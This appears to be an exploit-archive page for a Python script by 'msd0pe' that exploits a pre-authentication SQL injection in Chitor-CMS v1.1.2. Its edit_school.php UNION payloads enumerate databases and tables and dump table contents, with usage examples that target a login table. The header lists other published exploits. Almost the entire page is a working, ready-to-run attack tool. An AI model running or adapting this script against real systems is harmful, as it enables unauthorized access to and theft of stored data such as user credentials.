bd09027499
18 changes to exploits/shellcodes/ghdb Franklin Fueling Systems TS-550 - Default Password Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information Linux Kernel 6.2 - Userspace Processes To Enable Mitigation Microsoft Word 16.72.23040900 - Remote Code Execution (RCE) Bang Resto v1.0 - 'Multiple' SQL Injection Bang Resto v1.0 - Stored Cross-Site Scripting (XSS) Chitor-CMS v1.1.2 - Pre-Auth SQL Injection GDidees CMS 3.9.1 - Local File Disclosure Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE) Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS) ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE) Serendipity 2.4.0 - Cross-Site Scripting (XSS) Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated) FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE) AspEmail v5.6.0.2 - Local Privilege Escalation File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control
164 lines
No EOL
6.8 KiB
Python
Executable file
164 lines
No EOL
6.8 KiB
Python
Executable file
#!/usr/bin/python3
|
|
|
|
#######################################################
|
|
# #
|
|
# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection #
|
|
# Date: 2023/04/13 #
|
|
# ExploitAuthor: msd0pe #
|
|
# Project: https://github.com/waqaskanju/Chitor-CMS #
|
|
# My Github: https://github.com/msd0pe-1 #
|
|
# Patched the 2023/04/16: 69d3442 commit #
|
|
# #
|
|
#######################################################
|
|
|
|
__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
|
|
__author__ = 'msd0pe'
|
|
__version__ = '1.1'
|
|
__date__ = '2023/04/13'
|
|
|
|
class bcolors:
|
|
PURPLE = '\033[95m'
|
|
BLUE = '\033[94m'
|
|
GREEN = '\033[92m'
|
|
OCRA = '\033[93m'
|
|
RED = '\033[91m'
|
|
CYAN = '\033[96m'
|
|
ENDC = '\033[0m'
|
|
BOLD = '\033[1m'
|
|
UNDERLINE = '\033[4m'
|
|
|
|
class infos:
|
|
INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
|
|
ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
|
|
GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
|
|
PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "
|
|
|
|
import re
|
|
import requests
|
|
import optparse
|
|
from prettytable import PrettyTable
|
|
|
|
def DumpTable(url, database, table):
|
|
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
|
|
x = PrettyTable()
|
|
columns = []
|
|
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
|
|
u = requests.get(url + payload, headers=header)
|
|
try:
|
|
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
|
|
r = r[0].replace('\"',"").split(',')
|
|
if r == []:
|
|
pass
|
|
else:
|
|
for i in r:
|
|
columns.append(i)
|
|
pass
|
|
except:
|
|
pass
|
|
x.field_names = columns
|
|
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
|
|
u = requests.get(url + payload, headers=header)
|
|
try:
|
|
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
|
|
r = r[0].replace('\"',"").split(',')
|
|
if r == []:
|
|
pass
|
|
else:
|
|
for i in r:
|
|
i = i.split("xzmdpl")
|
|
x.add_rows([i])
|
|
except ValueError:
|
|
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
|
|
r = r[0].replace('\"',"").split(',')
|
|
if r == []:
|
|
pass
|
|
else:
|
|
for i in r:
|
|
i = i.split("xzmdpl")
|
|
i.append("")
|
|
x.add_rows([i])
|
|
print(x)
|
|
|
|
def ListTables(url, database):
|
|
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
|
|
x = PrettyTable()
|
|
x.field_names = ["TABLES"]
|
|
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
|
|
u = requests.get(url + payload, headers=header)
|
|
try:
|
|
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
|
|
r = r[0].replace('\"',"").split(',')
|
|
if r == []:
|
|
pass
|
|
else:
|
|
for i in r:
|
|
x.add_row([i])
|
|
except:
|
|
pass
|
|
print(x)
|
|
|
|
def ListDatabases(url):
|
|
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
|
|
x = PrettyTable()
|
|
x.field_names = ["DATABASES"]
|
|
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
|
|
u = requests.get(url + payload, headers=header)
|
|
try:
|
|
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
|
|
r = r[0].replace('\"',"").split(',')
|
|
if r == []:
|
|
pass
|
|
else:
|
|
for i in r:
|
|
x.add_row([i])
|
|
except:
|
|
pass
|
|
print(x)
|
|
|
|
def Main():
|
|
Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
|
|
Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
|
|
Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
|
|
Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
|
|
Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
|
|
Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
|
|
Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
|
|
(options, args) = Menu.parse_args()
|
|
|
|
Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
|
|
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
|
|
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
|
|
""")
|
|
Menu.add_option_group(Examples)
|
|
|
|
if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
|
|
Menu.print_help()
|
|
print('')
|
|
print(' %s' % __description__)
|
|
print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
|
|
print(' Any malicious or illegal activity may be punishable by law')
|
|
print(' Use at your own risk')
|
|
|
|
elif len(args) == 0:
|
|
try:
|
|
if options.url != None:
|
|
if options.l_databases != None:
|
|
ListDatabases(options.url)
|
|
if options.database != None:
|
|
if options.l_tables != None:
|
|
ListTables(options.url, options.database)
|
|
if options.table != None:
|
|
if options.dump != None:
|
|
DumpTable(options.url, options.database, options.table)
|
|
except:
|
|
print("Unexpected error")
|
|
|
|
if __name__ == '__main__':
|
|
try:
|
|
Main()
|
|
|
|
except KeyboardInterrupt:
|
|
print()
|
|
print(infos.PROCESS + "Exiting...")
|
|
print()
|
|
exit(1) |